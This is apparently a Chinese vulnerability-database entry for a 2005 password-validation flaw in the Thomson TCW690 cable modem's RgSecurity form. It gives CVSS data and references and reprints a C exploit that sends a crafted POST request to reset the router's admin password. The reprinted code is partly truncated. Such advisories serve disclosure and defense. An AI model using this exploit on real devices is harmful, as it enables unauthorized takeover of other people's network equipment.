发布时间 :2005-02-21 00:00:00
修订时间 :2016-10-17 23:12:04

[原文]The RgSecurity form in the HTTP server for the Thomson TCW690 cable modem running firmware 2.1 and software ST42.03.0a does not properly validate the password before performing changes, which allows remote attackers on the LAN to gain access via a direct POST request.

[CNNVD]Thomason cable modem RgSecurity表单验证远程攻击漏洞(CNNVD-200502-073)

        Thomson TCW690 cable modem 是一款线缆调制解调器。
        运行2.1固件和ST42.03.0a软件的Thomson TCW690 cable modem的HTTP服务器中的RgSecurity表单,在更改密码前未对其执行正确的验证,这可让LAN上的远程攻击者通过直接POST请求获取访问权。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20050219 Thomson TCW690 POST Password Validation Vulnerability
(UNKNOWN)  XF  thomson-tcw690-gain-access(19387)

- 漏洞信息

Thomason cable modem RgSecurity表单验证远程攻击漏洞
高危 未知
2005-02-21 00:00:00 2005-10-20 00:00:00
        Thomson TCW690 cable modem 是一款线缆调制解调器。
        运行2.1固件和ST42.03.0a软件的Thomson TCW690 cable modem的HTTP服务器中的RgSecurity表单,在更改密码前未对其执行正确的验证,这可让LAN上的远程攻击者通过直接POST请求获取访问权。

- 公告与补丁


- 漏洞信息 (829)

Thomson TCW690 POST Password Validation Exploit (EDBID:829)
hardware remote
2005-02-19 Verified
80 MurDoK
N/A [点击下载]
*     Thomson TCW690 POST Password Validation exploit
*  Tested with hardware version 2.1 and software version ST42.03.0a 
*  Bug found by: MurDoK <murdok.lnx at> 
*  Date: 02.19.2005
*	sh-3.00$ gcc mdk_tcw690.c -o tcw690
*	sh-3.00$ ./tcw690 123
*	*****************************************
*	Thomson TCW690 POST Password Validation
*	Change password exploit coded by MurDoK
*	*****************************************
*	[1] Connecting...
*	[2] Sending POST request...
*	[3] Done! go to
*	sh-3.00$
* fuck AUNA :/
#include <netdb.h> 
int i=0, x=0, fd; 
struct sockaddr_in sock; 
struct hostent *he; 

char badcode[1000] = 
"POST /goform/RgSecurity HTTP/1.1\r\n" 
"Connection: Keep-Alive\r\n" 
"User-Agent: Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.4.28) KHTML/3.3.2 (like Gecko)\r\n" 
"Pragma: no-cache\r\n" 
"Cache-control: no-cache\r\n" 
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\r\n" 
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate\r\n" 
"Accept-Charset: iso-8859-15, utf-8;q=0.5, *;q=0.5\r\n" 
"Accept-Language: es, en\r\n" 
"Content-Type: application/x-www-form-urlencoded\r\n" 
"Authorization: Basic\r\n" 
"Content-Length: 62\r\n" 
int main(int argc, char *argv[]) { 
//	system("clear"); 
	printf(" Thomson TCW690 POST Password Validation\n"); 
	printf(" Change password exploit coded by MurDoK\n"); 
	if(argc<3) { 
		printf("Usage: %s <router IP> <new_password>\n\n", argv[0]); 
	fd = socket(AF_INET, SOCK_STREAM, 0); 
	he = gethostbyname(argv[1]); 
	memset((char *) &sock, 0, sizeof(sock)); 
	sock.sin_family = AF_INET; 
	sock.sin_addr.s_addr=*((unsigned long*)he->h_addr); 
	printf("[1] Connecting... \n"); 
	if ((connect(fd, (struct sockaddr *) &sock, sizeof(sock))) < 0) { 
		printf("ERROR: Can't connect to host!\n"); 
		return 0; 
	strcat(badcode, "Password="); 
	strcat(badcode, argv[2]); 
	strcat(badcode, "&PasswordReEnter="); 
	strcat(badcode, argv[2]); 
	strcat(badcode, "&RestoreFactoryNo=0x00"); 
	printf("[2] Sending POST request...\n"); 
	write(fd, badcode, strlen(badcode)); 

	printf("[3] Done! go to http://%s\n", argv[1]); 
return 1; 

// [2005-02-19]

- 漏洞信息

Thomson TCW690 Cable Modem RgSecurity.asp POST Request Admin Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

The Thomson TCW690 Cable Modem contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a specially-crafted POST request is sent to the cable modem HTTP server's RgSecurity.asp form. This flaw may lead to a loss of integrity.

- 时间线

2005-02-19 2005-02-06
2005-02-19 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者